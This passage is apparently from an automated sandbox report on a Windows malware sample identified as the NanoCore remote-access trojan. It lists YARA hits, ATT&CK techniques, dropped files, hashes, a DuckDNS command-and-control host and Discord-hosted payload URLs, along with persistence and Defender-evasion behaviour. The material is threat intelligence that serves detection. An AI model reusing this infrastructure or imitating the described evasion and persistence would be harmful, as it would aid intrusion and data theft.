    Source: p9Ts9VV2NZ.exe, 00000009.00000002.565058267.0000000004928000.00000004.00000001.sdmpString found in binary or memory: <Module>System.IOvalue__mscorlibConnectionStateChangedConnectionFailedPipeClosedPipeCreatedconnected<DataHost>k__BackingField<LoggingHost>k__BackingField<NetworkHost>k__BackingFieldBuildingHostCacheDownloadFileset_WindowStyleProcessWindowStyleset_FileNameGetFileNamepipeNameCreatePipeCommandTypeDebuggerBrowsableStateCompilerGeneratedAttributeGuidAttributeDebuggableAttributeDebuggerBrowsableAttributeComVisibleAttributeAssemblyTitleAttributeAssemblyTrademarkAttributeAssemblyFileVersionAttributeAssemblyConfigurationAttributeAssemblyDescriptionAttributeCompilationRelaxationsAttributeAssemblyProductAttributeAssemblyCopyrightAttributeAssemblyCompanyAttributeRuntimeCompatibilityAttributeDownloadExecutevalueStringPathIClientNetworkDownloadExecuteInternalClientTest.dllSystemEnumNanoCore.ClientPluginSystem.ReflectionExceptionFileInfoFileSystemInfoProcessStartInfo.ctorSystem.DiagnosticsSystem.Runtime.InteropServicesSystem.Runtime.CompilerServicesDebuggingModesGetVariablesget_Attributesset_AttributesFileAttributesGetBuilderSettingsGetServerSettingsparamsGetConnectionsProcessInfectClientsObjectSystem.NetReadPacketWebClientStartportServerTestClientTestget_DataHostset_DataHostIClientDataHost_dataHostget_LoggingHostset_LoggingHostIClientLoggingHost_loggingHostget_NetworkHostset_NetworkHostIClientNetworkHost_networkHostNanoCore.ClientPluginHosthostset_CreateNoWindow?
    Source: svchost.exe, 0000000D.00000002.576454240.0000000003D8E000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
    Source: svchost.exe, 0000000F.00000000.439800347.00000000050AF000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
    Yara detected Nanocore RATShow sources
    Source: Yara matchFile source: 9.2.p9Ts9VV2NZ.exe.409457d.6.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 9.2.p9Ts9VV2NZ.exe.400000.0.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.0.svchost.exe.50afd10.16.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 9.2.p9Ts9VV2NZ.exe.6160000.23.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 13.2.svchost.exe.3d8ed58.4.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 9.2.p9Ts9VV2NZ.exe.408ff54.8.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 9.2.p9Ts9VV2NZ.exe.4af1a78.13.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 9.2.p9Ts9VV2NZ.exe.6160000.23.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 9.2.p9Ts9VV2NZ.exe.6164629.24.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 9.2.p9Ts9VV2NZ.exe.49f312a.10.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 9.2.p9Ts9VV2NZ.exe.408ff54.8.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 9.2.p9Ts9VV2NZ.exe.4af60a1.12.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 9.2.p9Ts9VV2NZ.exe.49deafd.11.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 9.2.p9Ts9VV2NZ.exe.4c56c41.19.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 13.0.svchost.exe.3d8ed58.16.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 13.0.svchost.exe.3d8ed58.6.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.0.svchost.exe.50afd10.6.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 9.2.p9Ts9VV2NZ.exe.408b11e.7.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 9.2.p9Ts9VV2NZ.exe.4af1a78.13.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 9.2.p9Ts9VV2NZ.exe.49d28c9.9.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 9.2.p9Ts9VV2NZ.exe.4c4d7e2.20.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 9.2.p9Ts9VV2NZ.exe.4c52618.18.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.0.svchost.exe.50afd10.6.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 9.2.p9Ts9VV2NZ.exe.4c52618.18.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.0.svchost.exe.50afd10.16.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 13.2.svchost.exe.3d8ed58.4.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 9.2.p9Ts9VV2NZ.exe.4aecc42.14.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 13.0.svchost.exe.3d8ed58.16.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 13.0.svchost.exe.3d8ed58.6.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 00000009.00000002.576136688.0000000006160000.00000004.00020000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000009.00000002.563022898.0000000003041000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000000.354484240.0000000004271000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000009.00000002.565058267.0000000004928000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000F.00000000.439800347.00000000050AF000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000009.00000002.564742845.000000000407B000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000009.00000002.557519070.0000000000402000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000009.00000002.567629894.0000000004C4D000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000D.00000002.576454240.0000000003D8E000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000F.00000000.461847446.00000000050AF000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000009.00000002.566082157.0000000004AEC000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000D.00000000.451141617.0000000003D8E000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000D.00000000.426806746.0000000003D8E000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: p9Ts9VV2NZ.exe PID: 4588, type: MEMORYSTR
    Source: Yara matchFile source: Process Memory Space: p9Ts9VV2NZ.exe PID: 6320, type: MEMORYSTR
    Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 6568, type: MEMORYSTR
    Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 6828, type: MEMORYSTR

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsWindows Management Instrumentation1Registry Run Keys / Startup Folder11Process Injection112Masquerading11Input Capture11Security Software Discovery321Remote ServicesInput Capture11Exfiltration Over Other Network MediumEncrypted Channel11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsRegistry Run Keys / Startup Folder11Disable or Modify Tools111LSASS MemoryProcess Discovery2Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion131Security Account ManagerVirtualization/Sandbox Evasion131SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationRemote Access Software1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection112NTDSApplication Window Discovery1Distributed Component Object ModelInput CaptureScheduled TransferIngress Tool Transfer1SIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptHidden Files and Directories1LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsNon-Application Layer Protocol2Manipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.commonSoftware Packing1Cached Domain CredentialsFile and Directory Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelApplication Layer Protocol13Jamming or Denial of ServiceAbuse Accessibility Features
    External Remote ServicesScheduled TaskStartup ItemsStartup ItemsTimestomp1DCSyncSystem Information Discovery12Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 signatures2 2 Behavior Graph ID: 509658 Sample: p9Ts9VV2NZ.exe Startdate: 26/10/2021 Architecture: WINDOWS Score: 100 53 Malicious sample detected (through community Yara rule) 2->53 55 Multi AV Scanner detection for submitted file 2->55 57 Sigma detected: NanoCore 2->57 59 8 other signatures 2->59 7 p9Ts9VV2NZ.exe 18 6 2->7         started        12 svchost.exe 2->12         started        14 svchost.exe 2->14         started        16 svchost.exe 2->16         started        process3 dnsIp4 49 cdn.discordapp.com 162.159.129.233, 443, 49691, 49692 CLOUDFLARENETUS United States 7->49 41 C:\Users\Public\Documents\...\svchost.exe, PE32 7->41 dropped 43 C:\Users\...\svchost.exe:Zone.Identifier, ASCII 7->43 dropped 63 Creates autostart registry keys with suspicious names 7->63 65 Adds a directory exclusion to Windows Defender 7->65 67 Hides threads from debuggers 7->67 69 Drops PE files with benign system names 7->69 18 p9Ts9VV2NZ.exe 7->18         started        23 WerFault.exe 7->23         started        25 powershell.exe 24 7->25         started        29 4 other processes 7->29 71 System process connects to network (likely due to code injection or exploit) 12->71 73 Multi AV Scanner detection for dropped file 12->73 75 Machine Learning detection for dropped file 12->75 51 162.159.134.233, 443, 49696, 49698 CLOUDFLARENETUS United States 14->51 27 WerFault.exe 16->27         started        file5 signatures6 process7 dnsIp8 45 fridaycav.duckdns.org 185.140.53.3, 49693, 49697, 49700 DAVID_CRAIGGG Sweden 18->45 37 C:\Users\user\AppData\Roaming\...\run.dat, Non-ISO 18->37 dropped 61 Hides that the sample has been downloaded from the Internet (zone.identifier) 18->61 47 192.168.2.1 unknown unknown 23->47 39 C:\ProgramData\Microsoft\...\Report.wer, Little-endian 23->39 dropped 31 conhost.exe 25->31         started        33 conhost.exe 29->33         started        35 conhost.exe 29->35         started        file9 signatures10 process11

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    p9Ts9VV2NZ.exe62%VirustotalBrowse
    p9Ts9VV2NZ.exe23%MetadefenderBrowse
    p9Ts9VV2NZ.exe79%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
    p9Ts9VV2NZ.exe100%Joe Sandbox ML

    Dropped Files

    SourceDetectionScannerLabelLink
    C:\Users\Public\Documents\???????????????\svchost.exe100%Joe Sandbox ML
    C:\Users\Public\Documents\???????????????\svchost.exe62%VirustotalBrowse
    C:\Users\Public\Documents\???????????????\svchost.exe23%MetadefenderBrowse
    C:\Users\Public\Documents\???????????????\svchost.exe79%ReversingLabsByteCode-MSIL.Trojan.AgentTesla

    Unpacked PE Files

    SourceDetectionScannerLabelLinkDownload
    9.2.p9Ts9VV2NZ.exe.400000.0.unpack100%AviraHEUR/AGEN.1108376Download File
    9.2.p9Ts9VV2NZ.exe.6160000.23.unpack100%AviraTR/NanoCore.fadteDownload File

    Domains

    No Antivirus matches

    URLs

    No Antivirus matches

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    cdn.discordapp.com
    162.159.129.233
    truefalse
      high
      fridaycav.duckdns.org
      185.140.53.3
      truefalse
        high

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        https://cdn.discordapp.com/attachments/893177342426509335/897185987367678032/09E84BB7.jpgfalse
          high
          https://cdn.discordapp.com/attachments/893177342426509335/897185985257963540/5D70BEC8.jpgfalse
            high

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            https://cdn.discordapp.comp9Ts9VV2NZ.exe, 00000000.00000000.331793073.0000000002531000.00000004.00000001.sdmp, svchost.exe, 0000000D.00000002.562342584.00000000028F1000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000000.426366340.0000000003371000.00000004.00000001.sdmpfalse
              high
              http://google.comp9Ts9VV2NZ.exe, 00000009.00000002.565058267.0000000004928000.00000004.00000001.sdmpfalse
                high
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namep9Ts9VV2NZ.exe, 00000000.00000000.331793073.0000000002531000.00000004.00000001.sdmp, p9Ts9VV2NZ.exe, 00000009.00000002.563022898.0000000003041000.00000004.00000001.sdmp, svchost.exe, 0000000D.00000002.562342584.00000000028F1000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000000.426366340.0000000003371000.00000004.00000001.sdmpfalse
                  high
                  https://cdn.discordapp.com/attachments/8svchost.exefalse
                    high

                    Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public

                    IPDomainCountryFlagASNASN NameMalicious
                    162.159.129.233
                    cdn.discordapp.comUnited States
                    13335CLOUDFLARENETUSfalse
                    185.140.53.3
                    fridaycav.duckdns.orgSweden
                    209623DAVID_CRAIGGGfalse
                    162.159.134.233
                    unknownUnited States
                    13335CLOUDFLARENETUStrue

                    Private

                    IP
                    192.168.2.1

                    General Information

                    Joe Sandbox Version:33.0.0 White Diamond
                    Analysis ID:509658
                    Start date:26.10.2021
                    Start time:18:55:38
                    Joe Sandbox Product:CloudBasic
                    Overall analysis duration:0h 14m 20s
                    Hypervisor based Inspection enabled:false
                    Report type:light
                    Sample file name:p9Ts9VV2NZ.exe
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                    Number of analysed new started processes analysed:42
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • HDC enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Detection:MAL
                    Classification:mal100.troj.expl.evad.winEXE@58/26@17/4
                    EGA Information:Failed
                    HDC Information:
                    • Successful, ratio: 17.9% (good quality ratio 0%)
                    • Quality average: 0%
                    • Quality standard deviation: 0%
                    HCA Information:
                    • Successful, ratio: 100%
                    • Number of executed functions: 0
                    • Number of non-executed functions: 0
                    Cookbook Comments:
                    • Adjust boot time
                    • Enable AMSI
                    • Found application associated with file extension: .exe
                    Warnings:
                    Show All
                    • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                    • TCP Packets have been reduced to 100
                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, consent.exe, WMIADAP.exe, conhost.exe, WmiPrvSE.exe
                    • Excluded IPs from analysis (whitelisted): 52.182.143.212
                    • Excluded domains from analysis (whitelisted): onedsblobprdcus15.centralus.cloudapp.azure.com, blobcollector.events.data.trafficmanager.net, watson.telemetry.microsoft.com
                    • Not all processes where analyzed, report is missing behavior information
                    • Report creation exceeded maximum time and may have missing behavior and disassembly information.
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • Report size getting too big, too many NtSetInformationFile calls found.

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    19:00:14API Interceptor292x Sleep call for process: powershell.exe modified
                    19:00:14AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce C:\Users\Public\Documents\\svchost.exe
                    19:00:25AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce C:\Users\Public\Documents\\svchost.exe
                    19:00:26API Interceptor818x Sleep call for process: p9Ts9VV2NZ.exe modified
                    19:00:38API Interceptor1x Sleep call for process: WerFault.exe modified

                    Joe Sandbox View / Context

                    IPs

                    No context

                    Domains

                    No context

                    ASN

                    No context

                    JA3 Fingerprints

                    No context

                    Dropped Files

                    No context

                    Created / dropped Files

                    C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_p9Ts9VV2NZ.exe_57eba7cc6aeb59822807620e587cad4c52b75ad_defa96b9_1a5a46a3\Report.wer
                    Process:C:\Windows\SysWOW64\WerFault.exe
                    File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):65536
                    Entropy (8bit):1.2674314282479284
                    Encrypted:false
                    SSDEEP:192:5zy6eNmmHBUZMXiaKeCvgdzhN/u7ssS274ItNz:k6eNHBUZMXiaeAn/u7ssX4ItNz
                    MD5:4FAD503BA0E0B431706EABA8D3B2EBA6
                    SHA1:7B96B07871389C9E3BCA506CA9085579A933DCD5
                    SHA-256:BD32F596ADD5C0BD153E804439E01887C0F7DF3EEA792756DD70D1720CF69473
                    SHA-512:81BFAE106F36F1D002FC55AFEF17F9BF28FB7B167234A3F9A3424B22C0A3A654BC00D12101C3C07F13437A528D087A65E1BCC3A6E0B6161E06F213B4B974481E
                    Malicious:true
                    Reputation:unknown
                    Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.2.7.9.7.7.3.6.2.9.7.0.6.0.4.1.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.7.9.7.7.3.6.3.7.2.0.5.9.9.5.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.0.4.a.7.f.7.b.-.3.8.5.8.-.4.7.9.c.-.8.e.e.9.-.2.7.e.c.d.7.d.2.b.d.c.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.8.8.2.5.a.b.4.-.7.d.4.d.-.4.5.9.1.-.8.2.3.e.-.0.5.a.3.3.0.7.b.9.5.a.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.p.9.T.s.9.V.V.2.N.Z...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.F.u.n.c.t.i.o.n.P.l.o.t.t.e.r...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.1.e.c.-.0.0.0.1.-.0.0.1.c.-.f.9.2.7.-.0.f.5.d.d.6.c.a.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.a.8.c.1.5.f.f.4.c.1.7.4.d.8.2.c.3.e.d.c.c.4.f.f.c.5.f.6.9.e.c.4.0.0.0.0.0.0.0.0.!.0.0.0.0.3.1.1.e.1.4.6.b.c.c.1.a.3.4.2.a.b.1.3.5.2.4.0.e.0.c.8.e.3.
                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER256F.tmp.dmp
                    Process:C:\Windows\SysWOW64\WerFault.exe
                    File Type:Mini DuMP crash report, 15 streams, Wed Oct 27 02:00:32 2021, 0x1205a4 type
                    Category:dropped
                    Size (bytes):340172
                    Entropy (8bit):3.6451669034882315
                    Encrypted:false
                    SSDEEP:3072:a/JB/bTyI9gIOgF5ukbJttf0jdUCgUKEnVBoZuZ5tFzIc0sjd+p6sbHTD2dQbd:Mz/6I9RpDvGTj7BcoJB0dp9HTDb
                    MD5:F5247E9EB785CF2CD26B4382E17DDA24
                    SHA1:D15481A879B85DD17C6D19E8BCEA3887F91A251B
                    SHA-256:B753152963C04F40C5751D0800B58A1FD20D53C7922FFF161FD9C9FE1EC8DA02
                    SHA-512:D2235F88F84D7D3E0D909CD58E5E4C0A4C40AA7AF4F208C48D29F9ED86237B90EB5458A41D8110A06284473F097ECC95560B58BCC4C01018D4D1348C21AF7F9F
                    Malicious:false
                    Reputation:unknown
                    Preview: MDMP....... .........xa.........................#..........T....-......T7...d..........`.......8...........T............g...............-.........../...................................................................U...........B......p0......GenuineIntelW...........T.............xa.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................
                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER386C.tmp.WERInternalMetadata.xml
                    Process:C:\Windows\SysWOW64\WerFault.exe
                    File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):8408
                    Entropy (8bit):3.695709127987104
                    Encrypted:false
                    SSDEEP:192:Rrl7r3GLNiZu626YFfSUXhgmfZ8SY62rDCprY89bCMsfi0Wm:RrlsNig626Y9SUXhgmf+SUWCffz
                    MD5:873F4C82B8B8D77B653E1D679F096F61
                    SHA1:389C0884D84CF4DE86EDD4CDF6FE597363D2180F
                    SHA-256:351F3C62F7D3F35EC2A1938367889A545B1A63E3879B3FEDA9C12221BCDF9FE4
                    SHA-512:07D4A7B3E31726C50AD7D27EB4211EA998A3212A4CB5FCA9A9BD2E76E27F3E28551D0EDA569FF5D7D164D3BCF5B758C3871581FB21B9A83ED4DF1413B3523DA3
                    Malicious:false
                    Reputation:unknown
                    Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.5.8.8.<./.P.i.d.>.......
                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER3A90.tmp.xml
                    Process:C:\Windows\SysWOW64\WerFault.exe
                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):4756
                    Entropy (8bit):4.476752396127727
                    Encrypted:false
                    SSDEEP:48:cvIwSD8zszJgtWI9uCvWSC8Bb8fm8M4JQkwfFFHiL+q8vDfds0k0Ad:uITfNhC+SNyJQiK5BJAd
                    MD5:2806B8ED8FBAA886B585F3FB59F8D808
                    SHA1:7D89BD1E15139013A01016A6ECA2AB97EC42F806
                    SHA-256:046ECFA84EF27B7247EF07435B8579A26546EF00EAF77893E2CF3178D9ACD739
                    SHA-512:4EA3845DE353D6A5C8FC0ACE0957D7BCA252F67190645D4092DCF2B73E5E41E44D585B7236B48D3B88C7B48C886F9D457381D45281BD5431386D674AF7179D0E
                    Malicious:false
                    Reputation:unknown
                    Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1227551" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER3B68.tmp.csv
                    Process:C:\Windows\System32\svchost.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):49908
                    Entropy (8bit):3.054331671932357
                    Encrypted:false
                    SSDEEP:1536:qFH7SNv3TBns5NGpxy+x1sYj5H0Q5XR+Pi:qFH7SNv3TBns5NGpxy+x1sYlH0Q5XR+K
                    MD5:1E105476DE9B6121F7291589BA2A511B
                    SHA1:82B864ABB5E1C644EDD506BD2655CEC65ED87818
                    SHA-256:F891F27ABDEF93F43C5435FE20912775E7876849593316EF0B9C7D4B024C848C
                    SHA-512:05E16A7F5452D0C457C16A0C6742BE3C2D446E1DB399D24C4F133F9EC96C6AC166EAF5D420E44006847DC313EA3DACCF66D0A62CAEDB7FEB4C9B1211E73A7CDE
                    Malicious:false
                    Reputation:unknown
                    Preview: I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER404B.tmp.txt
                    Process:C:\Windows\System32\svchost.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):13340
                    Entropy (8bit):2.6949368532209195
                    Encrypted:false
                    SSDEEP:96:9GiZYWY30bgDxYzYWmWzHTYEZ8Gt2imzqX6nfwQtvaI2SfqVIw4Ib03:9jZDgEihJ9aI2SfqVIAb03
                    MD5:0135E293287847A1E754FD6BC1923B48
                    SHA1:E9B9EF5F8F44BB2E16D8E923417508F1468E0259
                    SHA-256:2B826ADB77DD3A9AD4CEE2B8D06C227833BB9D9A0134A89D2538A0877E4BCB9F
